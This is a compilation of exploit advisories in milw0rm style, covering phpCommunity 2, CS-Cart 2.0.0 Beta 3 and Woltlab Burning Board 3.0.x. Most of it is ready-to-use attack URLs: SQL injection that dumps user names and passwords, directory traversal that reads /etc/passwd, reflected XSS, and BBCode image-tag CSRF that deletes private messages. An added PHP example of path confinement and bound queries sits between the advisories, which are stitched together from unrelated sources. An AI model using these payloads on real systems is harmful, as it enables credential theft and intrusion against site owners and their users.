Application: phpCommunity 2
Version: 2.1.8
Website: http://sourceforge.net/projects/phpcommunity2/
Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
This web application contains several vulnerabilities
that can be exploited to obtain restricted information.
The following are examples of the vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: module/forum/class_forum.php
module/forum/class_search.php
This bug allows a guest to view the username and
password of any registered user.
- [B] Directory Traversal
Requisites: none
File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directories on the web server.
- [C] Reflected XSS
Requisites: none
File affected: templates/1/login.php
Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>
Fix
No fix.
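The advisory above offers no fix. As an added example (not phpCommunity 2 code), the PHP below shows how the two parameters could be handled safely: the file parameter of show_file.php is confined to one directory with realpath, and forum_id is bound as an integer parameter instead of being interpolated into the query. The function names, the uploads base directory, and the com_forum table with its columns are assumptions.

```php
<?php
// Added example, not code from phpCommunity 2. Function names, the
// uploads directory and the com_forum table/columns are assumptions.

/**
 * Resolve a user-supplied relative file name inside $base and refuse
 * anything that escapes it ("../", absolute paths, symlinks out of $base).
 * Returns the canonical path, or null when the request must be rejected.
 */
function resolve_inside(string $base, string $userPath): ?string {
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null; // base directory itself is missing
    }
    // Reject empty input, NUL bytes and absolute paths outright.
    if ($userPath === '' || strpos($userPath, "\0") !== false || $userPath[0] === '/') {
        return null;
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $userPath);
    if ($candidate === false) {
        return null; // file does not exist
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null; // canonical path lies outside the allowed directory
    }
    return $candidate;
}

/**
 * Fetch a forum row with a bound integer parameter, so quote characters in
 * forum_id can never alter the SQL, regardless of magic_quotes_gpc.
 */
function fetch_forum(PDO $pdo, string $forumId): ?array {
    if (!ctype_digit($forumId)) {
        return null; // forum ids are integers; anything else is rejected
    }
    $stmt = $pdo->prepare('SELECT id, name FROM com_forum WHERE id = :id');
    $stmt->bindValue(':id', (int) $forumId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed usage in the style of show_file.php:
// $path = resolve_inside(__DIR__ . '/uploads', $_GET['file'] ?? '');
// if ($path === null) { http_response_code(400); exit; }
// readfile($path);
```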
# milw0rm
CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability
CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
Provider: www.cs-cart.com
Discovered by netsoul
Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
Contact: netsoul2[at]gmail.com
ALTO PARANA - PARAGUAY
Ñane mba'e teete
Exploit:
http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
# milw0rm
Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities
by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770
Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
BBCode IMG Tag Script Injection
[img]http://[host][/img]
Delete Private Messages (BBCode IMG Tag Script Injection)
Insert into a (forum message/private message/your signature) the code below:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.
Cross Site Scripting
http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
You can bypass magic_quotes_gpc with the String.fromCharCode function.
URL Redirection
http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
Full Path Disclosure
http://[host]/[path]/wbb/index.php?page=[]
This works on versions below 3.0.8 only.
# milw0rm